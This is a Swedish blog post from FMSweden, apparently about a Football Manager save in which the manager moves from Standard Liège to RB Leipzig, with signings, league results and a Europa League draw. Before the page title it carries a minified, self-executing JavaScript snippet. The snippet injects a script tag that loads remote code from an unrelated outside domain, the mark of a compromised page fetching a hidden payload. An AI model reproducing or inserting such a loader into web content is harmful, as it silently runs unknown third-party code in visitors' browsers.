;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); En kontroversiell flytt?? – FMSweden
Meny Stäng

En kontroversiell flytt??

Att Standard Liége vann trippeln var fantastiskt för Devran NH Bagis och hans kompanjon Sportchefs-Danne. Det var också startskottet på en period av intensivt funderande, för precis som det var Talang på TV precis, så var det också dags för Danne att trycka på Golden Buzzer och skicka Bagis vidare mot de stora ligorna. 

Under sommaren blev det tydligt att Belgien, precis som Skottland hade blivit för litet för Devran NH Bagis. Standard Liége tog hela den inhemska fotbollen och la den i fickan som souvenir. Ligan, supercupen och cupen vanns under säsongen och när den till slut va över, så var det ett lika solklart som vemodigt beslut att försöka ta sig vidare i karriären.

Det fanns mycket intresse och nu pratar vi om de riktigt stora ligorna och inte så mycket isländska höglandet, eller skotska slätterna.

Valet föll till slut på en av de stora klubbarna i Tyskland, inte helt okontroversiellt blev det Rasenballsport Leipzig, som Devran NH Bagis nu ska lotsa mot framgång.

Vi ska inte lägga några värderingar i RB Leipzig i denna AW:n, men kan konstatera att vi valde att flytta till östra Tyskland med vetskapen att klubbvalet mycket väl kan diskuteras.

Laget då?

Jodå, RBL kom sexa i Bundesliga under säsongen som gick, så det är ett lag spelandes i Europa League under 28/29 som numera har turkiskt styre.

Silly Season började med att Daniel Nilsson, numera kallad “Il Proffessore del Transfer”, tog med sig Dejan Nikolic, Matías Antúnez, Lloyd Townsend och Djordje Fratrovic från Standard. Det skulle bli ytterligare en spelare senare under säsongen, men anfallsparet som erövrade Belgien, skulle nu göra likadant i Bundesliga.

Ligan började med vinst borta mot Bayern München och sedan fem raka segrar till. Först när Borussia Dortmund anlände till Red Bull Arena, kom första förlusten. I skrivande stund ligger RBL 2:a i Bundesliga på samma poäng som Dortmund och två poäng före Hoffenheim på tredje plats.

I Europa League lottades man in i samma grupp som Valencia, FK Partizan och Sheffield United.

Efter fem segrar och ett kryss, borta mot Sheffield United, var gruppsegern klar och i första slutspelsrundan ställs man mot AS Monaco.

RB Leipzig är på väg mot en ny fin säsong och att kvala in till Champions League är minimikravet första säsongen. Djordje Fratrovic har redan i december tangerat klubbrekordet för mål under en säsong, med att redan ha gjort 29 mål i alla tävlingar.

Vad som händer i framtiden, lär just framtiden få utvisa.

Ta det nu lugnt i helgen

SKÅL

Tobbe

Please wait...

Liknande Inlägg

3 kommentarer

Lämna ett svar